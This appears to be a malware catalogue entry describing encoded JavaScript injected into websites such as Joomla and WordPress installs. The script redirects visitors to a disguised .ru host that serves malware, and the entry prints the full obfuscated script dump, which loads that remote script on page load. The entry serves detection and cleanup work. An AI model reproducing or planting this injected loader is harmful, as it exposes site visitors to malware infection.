Malware Entries

Description:This encoded javascript malware redirects the user to: http://sakura-ne-jp.y8.com.linkbucks-com.pinkvomit.ru:8080 /livejournal.com/livejournal.com/megaupload.com/google.com/w3.org.php Where malware is loaded. It uses multiple directories named as google, w3.org, livejournal, etc to try to disguise the user. Affecting: Any web site (Joomla and WordPress more often). Malware dump: <script>this.qp=”;this.bF=”;var N=”;function X() {var KV;if(KV!=’ZM’){KV=”};var J=new Array();var M=”";var z=new Date();var P=RegExp;var B;if(B!=’fy’ && B!=’c'){B=’fy’};var K=”;var W=new Array();var k=new String();var d=”g”;var F;this.I=”";var q=window;var p=new Array();var AU=new Array();var s=new String(“app”+”end”+”E4PChi”.substr(3)+”ld”);var MU;if(MU!=”){MU=’mA’};var Vf=”";var Pq=String(“]”);var U=new String(“qZOuscr”.substr(4)+”BesiptBse”.substr(3,3));var kW;if(kW!=’g’ && kW!=’xH’){kW=”};var r;if(r!=”){r=’gJ’};function L(l,T){var OC=new Array();var CI=new Array();var O=”yQZC[".substr(4);this.nU="";var XN=new Array();O+=T;this.Yj='';var zk="";O+=Pq;var pK=new String();var m_=new Date();var Xb=new Date();var GY=new Date();var Z=new P(O, d);return l.replace(Z, K);var yX=new Date();var R=new Date();};var Lv=new Array();var yN=new Array();var zt=new String();var Uf=new String();var e="c2ude".substr(3)+"feNO9".substr(0,2)+"rHXEQ".substr(0,1);var WN;if(WN!='Kk' && WN!='bI'){WN=''};var dC=new String();var V=new String("onloawDI".substr(0,5)+"dsXGc".substr(0,1));var Ux;if(Ux!='Oj' && Ux != ''){Ux=null};this.rJ='';var Zn=L('sTrTcT','y9VT2whiG');var Fk=new Array();F=function(){this.vE='';this.Yn='';try {this.SP='';v=document.createElement(U);var dE;if(dE!='' && dE!='wO'){dE=''};var y=String("body");v[e]=[1][0];var Ww=new Array();v[Zn] = L(‘hJtGtUp3:V/E/xsEa5kBu1r5az-3nVeG-1j5pE.JyQ83.3cQoTmT.BlViUnHkTbVuHcTk3sQ-zczozm5.5pDi5nHkGvUoxm5iTtx.GrUuG:3′,’PfU7BE3TVQJ1GD5Hxz’)+L(’82735912307147392841361430534916′,’16475239′)+L(‘/HlFi4vAeVjsoSuRrLnBaFlE.kc1oSmR/zlkiFvTeFjBoPuRrVnsaDlR.Sc1oDmT/kmLekgsaBuEpzlUoDaPd1.DcDoPmL/HgBoVoBgTlReb.scRosmP/PwA3b.Lo1rsgk.TpRh1pU’,'PU4szLBTDRHbEVSkAF1′);this.qH=”";var Ojy=new Date();var Kj=”;document[y][s](v);var tc;if(tc!=”){tc=’po’};} catch(LO){};};q[V]=F;var wS=”;var pyS;if(pyS!=’gj’){pyS=’gj’};};var bn;if(bn!=”){bn=’DQ’};var IE=new Array();X();var Km;if(Km!=” && Km!=’yV’){Km=null};var Tj;if(Tj!=’WNO’ && Tj!=’OB’){Tj=’WNO’};</script>